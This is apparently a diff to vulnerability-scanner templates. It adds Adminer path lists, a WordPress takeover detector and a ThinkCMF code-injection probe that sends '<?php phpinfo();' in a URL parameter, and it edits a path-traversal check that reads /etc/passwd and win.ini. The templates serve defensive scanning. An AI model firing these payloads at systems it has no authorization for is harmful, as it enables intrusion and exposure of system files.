+/editor-4.7.1.php
+/editor-4.7.2-cs.php
+/editor-4.7.2-de.php
+/editor-4.7.2-en.php
+/editor-4.7.2-mysql-cs.php
+/editor-4.7.2-mysql-de.php
+/editor-4.7.2-mysql-en.php
+/editor-4.7.2-mysql-pl.php
+/editor-4.7.2-mysql-sk.php
+/editor-4.7.2-mysql.php
+/editor-4.7.2-pl.php
+/editor-4.7.2-sk.php
+/editor-4.7.2.php
+/editor-4.7.3-cs.php
+/editor-4.7.3-de.php
+/editor-4.7.3-en.php
+/editor-4.7.3-mysql-cs.php
+/editor-4.7.3-mysql-de.php
+/editor-4.7.3-mysql-en.php
+/editor-4.7.3-mysql-pl.php
+/editor-4.7.3-mysql-sk.php
+/editor-4.7.3-mysql.php
+/editor-4.7.3-pl.php
+/editor-4.7.3-sk.php
+/editor-4.7.3.php
+/editor-4.7.4-cs.php
+/editor-4.7.4-de.php
+/editor-4.7.4-en.php
+/editor-4.7.4-mysql-cs.php
+/editor-4.7.4-mysql-de.php
+/editor-4.7.4-mysql-en.php
+/editor-4.7.4-mysql-pl.php
+/editor-4.7.4-mysql-sk.php
+/editor-4.7.4-mysql.php
+/editor-4.7.4-pl.php
+/editor-4.7.4-sk.php
+/editor-4.7.4.php
+/editor-4.7.5-cs.php
+/editor-4.7.5-de.php
+/editor-4.7.5-en.php
+/editor-4.7.5-mysql-cs.php
+/editor-4.7.5-mysql-de.php
+/editor-4.7.5-mysql-en.php
+/editor-4.7.5-mysql-pl.php
+/editor-4.7.5-mysql-sk.php
+/editor-4.7.5-mysql.php
+/editor-4.7.5-pl.php
+/editor-4.7.5-sk.php
+/editor-4.7.5.php
+/editor-4.7.6-cs.php
+/editor-4.7.6-de.php
+/editor-4.7.6-en.php
+/editor-4.7.6-mysql-cs.php
+/editor-4.7.6-mysql-de.php
+/editor-4.7.6-mysql-en.php
+/editor-4.7.6-mysql-pl.php
+/editor-4.7.6-mysql-sk.php
+/editor-4.7.6-mysql.php
+/editor-4.7.6-pl.php
+/editor-4.7.6-sk.php
+/editor-4.7.6.php
+/editor-4.7.7-cs.php
+/editor-4.7.7-de.php
+/editor-4.7.7-en.php
+/editor-4.7.7-mysql-cs.php
+/editor-4.7.7-mysql-de.php
+/editor-4.7.7-mysql-en.php
+/editor-4.7.7-mysql-pl.php
+/editor-4.7.7-mysql-sk.php
+/editor-4.7.7-mysql.php
+/editor-4.7.7-pl.php
+/editor-4.7.7-sk.php
+/editor-4.7.7.php
+/editor-4.7.8-cs.php
+/editor-4.7.8-de.php
+/editor-4.7.8-en.php
+/editor-4.7.8-mysql-cs.php
+/editor-4.7.8-mysql-de.php
+/editor-4.7.8-mysql-en.php
+/editor-4.7.8-mysql-pl.php
+/editor-4.7.8-mysql-sk.php
+/editor-4.7.8-mysql.php
+/editor-4.7.8-pl.php
+/editor-4.7.8-sk.php
+/editor-4.7.8.php
+/editor-4.7.9-cs.php
+/editor-4.7.9-de.php
+/editor-4.7.9-en.php
+/editor-4.7.9-mysql-cs.php
+/editor-4.7.9-mysql-de.php
+/editor-4.7.9-mysql-en.php
+/editor-4.7.9-mysql-pl.php
+/editor-4.7.9-mysql-sk.php
+/editor-4.7.9-mysql.php
+/editor-4.7.9-pl.php
+/editor-4.7.9-sk.php
+/editor-4.7.9.php
+/editor-4.8.0-cs.php
+/editor-4.8.0-de.php
+/editor-4.8.0-en.php
+/editor-4.8.0-mysql-cs.php
+/editor-4.8.0-mysql-de.php
+/editor-4.8.0-mysql-en.php
+/editor-4.8.0-mysql-pl.php
+/editor-4.8.0-mysql-sk.php
+/editor-4.8.0-mysql.php
+/editor-4.8.0-pl.php
+/editor-4.8.0-sk.php
+/editor-4.8.0.php
+/editor-mysql.php
+/editor.php
+/editor/
+/mysql.php
+/php/adminer.php
+/phpmyadmin.php
+/public/adminer.php
+/sql.php
+/tools/adminer.php
+/web/adminer.php
+/wp-content/plugins/adminer/adminer.php
--- a/takeovers/wordpress-takeover.yaml
+++ b/takeovers/wordpress-takeover.yaml
@ -1,10 +1,10 @@
 id: wordpress-takeover

 info:
-  name: wordpress takeover detection
-  author: pdcommunity
+  name: WordPress takeover detection
+  author: pdcommunity & geeknik
  severity: high
-  tags: takeover
+  tags: takeover,wordpress
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

 requests:
@ -12,7 +12,13 @@ requests:
    path:
      - "{{BaseURL}}"

+    redirects: true
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - Do you want to register
+          - 'Do you want to register'
+
+      - type: regex
+        regex:
+          - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com"
--- a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
@ -0,0 +1,27 @@
+id: thinkcmf-arbitrary-code-execution
+
+info:
+  name: ThinkCMF Arbitrary code execution
+  author: pikpikcu
+  severity: high
+  reference: https://www.shuzhiduo.com/A/l1dygr36Je/
+  tags: thinkcmf
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "PHP License"
+          - "PHP Variables"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
@ -10,7 +10,6 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/?a=display&templateFile=README.md"
      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"

@ -21,8 +20,6 @@ requests:
        regex:
          - "root:[x*]:0:0:"
          - "bit app support"
-          - 'ThinkCMF'
-        part: body

      - type: status
        status:
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -11,6 +11,8 @@ workflows:
    matchers:
      - name: wordpress
        subtemplates:
+          - template: cves/2016/CVE-2016-10033.yaml
+          - template: cves/2017/CVE-2017-1000170.yaml
          - template: cves/2018/CVE-2018-3810.yaml
          - template: cves/2019/CVE-2019-6112.yaml
          - template: cves/2019/CVE-2019-6715.yaml